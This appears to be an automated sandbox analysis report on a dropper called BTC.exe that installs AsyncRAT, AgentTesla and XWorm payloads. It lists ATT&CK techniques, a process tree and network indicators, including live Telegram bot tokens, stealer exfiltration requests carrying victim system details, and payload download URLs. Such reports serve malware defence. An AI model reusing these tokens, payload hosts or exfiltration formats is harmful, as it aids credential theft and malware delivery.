Source: Yara match, File source: 0.2.BTC.exe.2c80488.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.BTC.exe.2c75848.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.0.Windows Defender Service Host.exe.f60000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.BTC.exe.2c80488.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.BTC.exe.2c75848.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000007.00000000.2009427541.0000000000F62000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.2010752692.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: BTC.exe PID: 2796, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: Windows Defender Service Host.exe PID: 7140, type: MEMORYSTR
Source: Yara match, File source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe, type: DROPPED
Source: Yara match, File source: sslproxydump.pcap, type: PCAP
MITRE ATT&CK Matrix (numbers in front of a technique are the per-technique counts shown in the report)

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
| Gather Victim Identity Information | 1 Scripting | Valid Accounts | 131 Windows Management Instrumentation | 1 Scripting | 1 DLL Side-Loading | 41 Disable or Modify Tools | 1 OS Credential Dumping | 2 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | 1 Data Encrypted for Impact |
| Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 112 Process Injection | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 124 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 3 Scheduled Task/Job | 3 Scheduled Task/Job | 3 Scheduled Task/Job | 221 Obfuscated Files or Information | Security Account Manager | 1 Query Registry | SMB/Windows Admin Shares | 1 Screen Capture | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | 21 Registry Run Keys / Startup Folder | 21 Registry Run Keys / Startup Folder | 22 Software Packing | NTDS | 441 Security Software Discovery | Distributed Component Object Model | 21 Input Capture | 1 Non-Standard Port | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Timestomp | LSA Secrets | 251 Virtualization/Sandbox Evasion | SSH | 1 Clipboard Data | 4 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 3 Process Discovery | VNC | GUI Input Capture | 115 Application Layer Protocol | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 21 Masquerading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 251 Virtualization/Sandbox Evasion | Proc Filesystem | 1 Remote System Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 112 Process Injection | /etc/passwd and /etc/shadow | 11 System Network Configuration Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
| IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 Hidden Files and Directories | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
| Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 1 Hidden Users | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption |
Behavior Graph ID: 1503194, Sample: BTC.exe, Startdate: 03/09/2024, Architecture: WINDOWS, Score: 100

• Start
  • DNS/IP: api.telegram.org (Uses the Telegram API (likely for C&C communication)); payloads-poison.000webhostapp.com; 5 other IPs or domains
  • Signatures: Multi AV Scanner detection for domain / URL; Suricata IDS alerts for network traffic; Found malware configuration; 36 other signatures
  • BTC.exe 8 (started)
    • Dropped: C:\Users\user\AppData\Roaming\update.exe, PE32; C:\Users\user\AppData\Roaming\svchost.exe, PE32; C:\Users\user\AppData\Roaming\crack.exe, PE32; 4 other malicious files
    • Signatures: Creates files with lurking names (e.g. Crack.exe); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Drops PE files with benign system names
    • Window Security.exe (started)
      • DNS/IP: ip-api.com 208.95.112.1, 49706, 49707, 80 TUT-ASUS United States; 91.134.207.16, 49722, 49740, 80 OVHFR France; us-east-1.route-1.000webhost.awex.io 145.14.144.231, 443, 49721 AWEXUS Netherlands
      • Dropped: C:\Users\user\...\Windows Security.exe, PE32
      • Signatures: Contains functionality to hide user accounts; 4 other signatures
      • Windows Security.exe (started)
        • DNS/IP: 146.190.29.250, 49710, 49719, 49720 UUNETUS United States
        • Signatures: Protects its processes via BreakOnTermination flag; Hides that the sample has been downloaded from the Internet (zone.identifier); Installs a global keyboard hook
        • schtasks.exe (started)
          • conhost.exe (started)
      • 16 other processes (started)
        • Signatures: Loading BitLocker PowerShell Module
        • 17 other processes (started)
    • svchost.exe 14 158 (started)
      • Dropped: C:\Users\user\AppData\...96VWZAPQSQL.xlsx, ASCII; C:\Users\user\AppData\...98VWZAPQSQL.docx, ASCII; C:\Users\user\AppData\...behaviorgraphIGIYTFFYT.jpg, ASCII; 2 other malicious files
      • Signatures: System process connects to network (likely due to code injection or exploit); Multi AV Scanner detection for dropped file; Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); 2 other signatures
      • 3 other processes (started)
        • 7 other processes (started)
    • Cracked.exe 9 (started)
      • Dropped: C:\...\Windows Security Health Service.exe, PE32; C:\Users\user\AppData\...\Cracked.exe.log, CSV
      • Signatures: Protects its processes via BreakOnTermination flag; Creates files with lurking names (e.g. Crack.exe); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      • cmd.exe (started)
        • Windows Security Health Service.exe (started)
          • DNS/IP: 185.252.232.158, 49711, 49712, 49745 QUICKPACKETUS Germany; 64.23.232.116, 49713, 49727, 49746 AFFINITY-FTLUS United States
          • Signatures: Protects its processes via BreakOnTermination flag
        • 2 other processes (started)
      • cmd.exe (started)
        • Signatures: Uses schtasks.exe or at.exe to add and modify task schedules
        • 2 other processes (started)
    • 3 other processes (started)
      • DNS/IP: api.telegram.org 149.154.167.220, 443, 49705, 49708 TELEGRAMRU United Kingdom; 165.227.91.90, 49709, 49749, 49767 DIGITALOCEAN-ASNUS United States; 4 other IPs or domains
      • Dropped: C:\Users\user\AppData\Local\...\crack.exe.log, CSV
      • Signatures: Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines); Tries to harvest and steal browser information (history, passwords, etc); Tries to harvest and steal WLAN passwords
      • cmd.exe (started)
        • Signatures: Uses ping.exe to sleep; Uses ping.exe to check the status of other devices and networks; Uses netsh to modify the Windows network and firewall settings
        • 2 other processes (started)
      • 4 other processes (started)
        • Signatures: Tries to harvest and steal WLAN passwords
        • 8 other processes (started)
  • Window Security.exe (started)
    • cmd.exe (started)
      • Signatures: Uses ping.exe to sleep
      • Window Security.exe (started)
        • cmd.exe (started)
          • Signatures: Uses ping.exe to sleep
          • Window Security.exe (started)
            • cmd.exe (started)
              • Signatures: Uses ping.exe to sleep
              • conhost.exe (started)
              • chcp.com (started)
              • PING.EXE (started)
          • conhost.exe (started)
          • chcp.com (started)
          • PING.EXE (started)
      • 3 other processes (started)
  • Windows Security Health Service.exe (started)
  • 3 other processes (started)

| Source | Detection | Scanner | Label | Link |
| BTC.exe | 63% | Virustotal | | Browse |
| BTC.exe | 100% | Avira | TR/Dropper.Gen | |
| BTC.exe | 100% | Joe Sandbox ML | | |
| Source | Detection | Scanner | Label | Link |
| C:\Users\user\AppData\Roaming\Cracked.exe | 87% | ReversingLabs | ByteCode-MSIL.Backdoor.AsyncRAT | |
| C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe | 100% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla | |
| C:\Users\user\AppData\Roaming\Window Security.exe | 100% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla | |
| C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe | 81% | ReversingLabs | ByteCode-MSIL.Backdoor.XWormRAT | |
| C:\Users\user\AppData\Roaming\Windows Security Health Service.exe | 87% | ReversingLabs | ByteCode-MSIL.Backdoor.AsyncRAT | |
| C:\Users\user\AppData\Roaming\crack.exe | 92% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla | |
| C:\Users\user\AppData\Roaming\svchost.exe | 100% | ReversingLabs | ByteCode-MSIL.Backdoor.AsyncRat | |
| C:\Users\user\AppData\Roaming\update.exe | 96% | ReversingLabs | ByteCode-MSIL.Backdoor.AsyncRat | |
                            No Antivirus matches
| Source | Detection | Scanner | Label | Link |
| ip-api.com | 0% | Virustotal | | Browse |
| api.mylnikov.org | 3% | Virustotal | | Browse |
| api.telegram.org | 2% | Virustotal | | Browse |
| us-east-1.route-1.000webhost.awex.io | 2% | Virustotal | | Browse |
| icanhazip.com | 0% | Virustotal | | Browse |
| 201.75.14.0.in-addr.arpa | 0% | Virustotal | | Browse |
| payloads-poison.000webhostapp.com | 15% | Virustotal | | Browse |
| Source | Detection | Scanner | Label | Link |
| https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe | |
| https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe | |
| https://aka.ms/pscore6lB | 0% | URL Reputation | safe | |
| https://nuget.org/nuget.exe | 0% | URL Reputation | safe | |
| http://ip-api.com | 0% | URL Reputation | safe | |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe | |
| http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe | |
| http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe | |
| http://schemas.datacontract.org/2004/07/ | 0% | URL Reputation | safe | |
| https://contoso.com/Icon | 0% | URL Reputation | safe | |
| https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe | |
| https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe | |
| https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | 0% | URL Reputation | safe | |
| http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe | |
| https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL | 0% | URL Reputation | safe | |
| https://contoso.com/License | 0% | URL Reputation | safe | |
| https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe | |
| https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe | |
| https://contoso.com/ | 0% | URL Reputation | safe | |
| http://nuget.org/NuGet.exe | 0% | URL Reputation | safe | |
| https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe | |
| https://support.mozilla.org | 0% | URL Reputation | safe | |
| https://api.telegram.org/bot5904946097:AAEb_US4tHY3ko2z9Y7a20zEv4AtQqZipKM/sendMessage?chat_id=58817 | 0% | Avira URL Cloud | safe | |
| https://api.telegram.org/bot | 0% | Avira URL Cloud | safe | |
| https://go.microPackageManagementp | 0% | Avira URL Cloud | safe | |
| https://www.000webhost.com/static/default.000webhost.com/images/cdn/corgi-with-shades.svg | 0% | Avira URL Cloud | safe | |
| https://api.telegram.org/bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendDocument?chat_id=6291749148 | 0% | Avira URL Cloud | safe | |
| https://github.com/LimerBoy/StormKitty | 0% | Avira URL Cloud | safe | |
| http://91.134.207.16/svchost.exe | 0% | Avira URL Cloud | safe | |
| 146.190.29.250 | 0% | Avira URL Cloud | safe | |
| https://api.telegram.org/bot5904946097:AAEb_US4tHY3ko2z9Y7a20zEv4AtQqZipKM/sendMessage?chat_id=58817 | 2% | Virustotal | | Browse |
| https://payloads-poison.000webhostapp.com/r77-x86.dll | 100% | Avira URL Cloud | phishing | |
| https://api.telegram.org/bot | 1% | Virustotal | | Browse |
| https://api.telegram.org/bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendDocument?chat_id=6291 | 0% | Avira URL Cloud | safe | |
| http://91.134.207.16/svchost.exe | 11% | Virustotal | | Browse |
| https://www.000webhost.com/static/default.000webhost.com/images/cdn/corgi-with-shades.svg | 1% | Virustotal | | Browse |
| https://github.com/LimerBoy/StormKitty | 2% | Virustotal | | Browse |
| http://91.134.207.16/WinSCP.com | 0% | Avira URL Cloud | safe | |
| https://api.mylnikov.org | 0% | Avira URL Cloud | safe | |
| http://api.ipify.org/ | 0% | Avira URL Cloud | safe | |
| https://api.telegram.org/bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendDocument?chat_id=6291749148 | 1% | Virustotal | | Browse |
| https://api.telegram.org/bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/sendMessage | 0% | Avira URL Cloud | safe | |
| http://91.134.207.16/ngrok.exe | 0% | Avira URL Cloud | safe | |
| http://api.ipify.org/ | 0% | Virustotal | | Browse |
| https://api.mylnikov.org | 3% | Virustotal | | Browse |
| https://payloads-poison.000webhostapp.com/r77-x86.dll | 8% | Virustotal | | Browse |
| http://api.telegram.orgd | 0% | Avira URL Cloud | safe | |
| http://91.134.207.16/WinSCP.com | 8% | Virustotal | | Browse |
| http://icanhazip.com | 0% | Avira URL Cloud | safe | |
| http://91.134.207.16/Install.exe | 0% | Avira URL Cloud | safe | |
| https://api.telegram.org/bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendDocument?chat_id=6291 | 1% | Virustotal | | Browse |
| 146.190.29.250 | 2% | Virustotal | | Browse |
| https://api.telegram.org/bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/sendMessage | 2% | Virustotal | | Browse |
| https://api.telegram.org/bot5904946097:AAEb_US4tHY3ko2z9Y7a20zEv4AtQqZipKM/sendMessage?chat_id=5881759996&text=This+Not+RDP | 0% | Avira URL Cloud | safe | |
| http://91.134.207.16/ngrok.exe | 9% | Virustotal | | Browse |
| https://go.microP | 0% | Avira URL Cloud | safe | |
| https://api.telegram.org/bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/sendMessage?chat_id=6291749148&text=%F0%9F%93%81%20Uploading%20Log%20Folders... | 0% | Avira URL Cloud | safe | |
| http://freegeoip.net/xml/ | 0% | Avira URL Cloud | safe | |
| https://www.000webhost.com/static/default.000webhost.com/images/cdn/corgi-eating-a-cassette.svg | 0% | Avira URL Cloud | safe | |
| http://icanhazip.com | 0% | Virustotal | | Browse |
| https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096 | 0% | Avira URL Cloud | safe | |
| http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Avira URL Cloud | safe | |
| http://91.134.207.16/autoupdate1.exe | 0% | Avira URL Cloud | safe | |
| http://91.134.207.16/Install.exe | 11% | Virustotal | | Browse |
| https://api.telegram.org/bot5904946097:AAEb_US4tHY3ko2z9Y7a20zEv4AtQqZipKM/sendMessage?chat_id=5881759996&text=This+Not+RDP | 2% | Virustotal | | Browse |
| http://freegeoip.net/xml/ | 0% | Virustotal | | Browse |
| https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 | 0% | Avira URL Cloud | safe | |
| http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Virustotal | | Browse |
| https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/send | 0% | Avira URL Cloud | safe | |
| https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096 | 2% | Virustotal | | Browse |
| https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid= | 0% | Avira URL Cloud | safe | |
| https://api.telegram.org/bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/sendMessage?chat_id=6291749148&text=%F0%9F%93%81%20Uploading%20Log%20Folders... | 2% | Virustotal | | Browse |
| https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe | |
| http://crl.miu | 0% | Avira URL Cloud | safe | |
| http://91.134.207.16/autoupdate1.exe | 12% | Virustotal | | Browse |
| https://www.ifconfig.me/ | 0% | Avira URL Cloud | safe | |
| https://www.000webhost.com/static/default.000webhost.com/images/cdn/corgi-eating-a-cassette.svg | 1% | Virustotal | | Browse |
| https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/send | 2% | Virustotal | | Browse |
| 167.99.94.206 | 0% | Avira URL Cloud | safe | |
| https://www.ifconfig.me/ | 0% | Virustotal | | Browse |
| https://github.com/Pester/Pester | 1% | Virustotal | | Browse |
| https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid= | 1% | Virustotal | | Browse |
| https://github.com/LimerBoy/StormKitty0&eq | 0% | Avira URL Cloud | safe | |
| https://payloads-poison.000webhostapp.com/r77-x64.dll | 100% | Avira URL Cloud | phishing | |
| http://91.134.207.16/rdpinstall.exe | 0% | Avira URL Cloud | safe | |
| http://91.134.207.16/update.exe | 0% | Avira URL Cloud | safe | |
| https://api.telegram.org/bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendMessage?chat_id=6291749148&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Stealer%202.0.4%20-%20Results:*%0ADate:%202024-09-03%2012:16:00%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20936905%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20HGRRGE87%0ARAM:%204095MB%0AHWID:%20BD77145644%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%201%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20%20Contact%20Developer:%20@FlatLineStealer%0A%20%20%20Join%20The%20Telegram%20Channel:%20@CashOutGangTalk&parse_mode=Markdown&disable_web_page_preview=True | 0% | Avira URL Cloud | safe | |
| https://api.telegram.orgd | 0% | Avira URL Cloud | safe | |
| http://api.mylnikov.orgd | 0% | Avira URL Cloud | safe | |
| https://api.telegram.org/file/bot | 0% | Avira URL Cloud | safe | |
| 167.99.94.206 | 1% | Virustotal | | Browse |
| http://api.telegram.org | 0% | Avira URL Cloud | safe | |
| http://api.mylnikov.org | 0% | Avira URL Cloud | safe | |
| http://91.134.207.16/ngrok.exe=set | 0% | Avira URL Cloud | safe | |
| http://91.134.207.16/rdpinstall.exe | 10% | Virustotal | | Browse |
| https://api.telegram.org/bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendMessage?chat_id=62917 | 0% | Avira URL Cloud | safe | |
| https://api.telegram.org | 0% | Avira URL Cloud | safe | |
| http://icanhazip.com/ | 0% | Avira URL Cloud | safe | |
| https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15d | 0% | Avira URL Cloud | safe | |
| 165.227.91.90 | 0% | Avira URL Cloud | safe | |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ip-api.com | 208.95.112.1 | true | true | - | unknown
api.mylnikov.org | 172.67.196.114 | true | true | - | unknown
api.telegram.org | 149.154.167.220 | true | true | - | unknown
us-east-1.route-1.000webhost.awex.io | 145.14.144.231 | true | false | - | unknown
icanhazip.com | 104.16.185.241 | true | true | - | unknown
201.75.14.0.in-addr.arpa | unknown | unknown | true | - | unknown
payloads-poison.000webhostapp.com | unknown | unknown | true | - | unknown
Name | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendDocument?chat_id=6291749148 | true | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://91.134.207.16/svchost.exe | false | 11%, Virustotal, Browse; Avira URL Cloud: safe | unknown
146.190.29.250 | true | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://api.telegram.org/bot5904946097:AAEb_US4tHY3ko2z9Y7a20zEv4AtQqZipKM/sendMessage?chat_id=5881759996&text=This+Not+RDP | true | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://api.telegram.org/bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/sendMessage?chat_id=6291749148&text=%F0%9F%93%81%20Uploading%20Log%20Folders... | true | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 | true | Avira URL Cloud: safe | unknown
167.99.94.206 | true | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://payloads-poison.000webhostapp.com/r77-x64.dll | true | Avira URL Cloud: phishing | unknown
https://api.telegram.org/bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendMessage?chat_id=6291749148&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Stealer%202.0.4%20-%20Results:*%0ADate:%202024-09-03%2012:16:00%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20936905%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20HGRRGE87%0ARAM:%204095MB%0AHWID:%20BD77145644%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%201%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20%20Contact%20Developer:%20@FlatLineStealer%0A%20%20%20Join%20The%20Telegram%20Channel:%20@CashOutGangTalk&parse_mode=Markdown&disable_web_page_preview=True | true | Avira URL Cloud: safe | unknown
http://icanhazip.com/ | true | Avira URL Cloud: safe | unknown
165.227.91.90 | true | Avira URL Cloud: safe | unknown
http://ip-api.com/json/ | true | Avira URL Cloud: safe | unknown
https://api.telegram.org/bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendMessage?chat_id=6291749148&text=%F0%9F%93%81%20Uploading%20Log%20Folders... | true | Avira URL Cloud: safe | unknown
https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096425866 | true | Avira URL Cloud: safe | unknown
https://api.telegram.org/bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/sendMessage?chat_id=6291749148&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Stealer%202.0.4%20-%20Results:*%0ADate:%202024-09-03%2012:16:00%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20936905%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20HGRRGE87%0ARAM:%204095MB%0AHWID:%20BD77145644%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%201%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20%20Contact%20Developer:%20@FlatLineStealer%0A%20%20%20Join%20The%20Telegram%20Channel:%20@CashOutGangTalk&parse_mode=Markdown&disable_web_page_preview=True | true | Avira URL Cloud: safe | unknown
https://api.telegram.org/bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/sendMessage?chat_id=6291749148&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AE126416575CB5DA0505E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20HGRRGE87%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 | true | Avira URL Cloud: safe | unknown
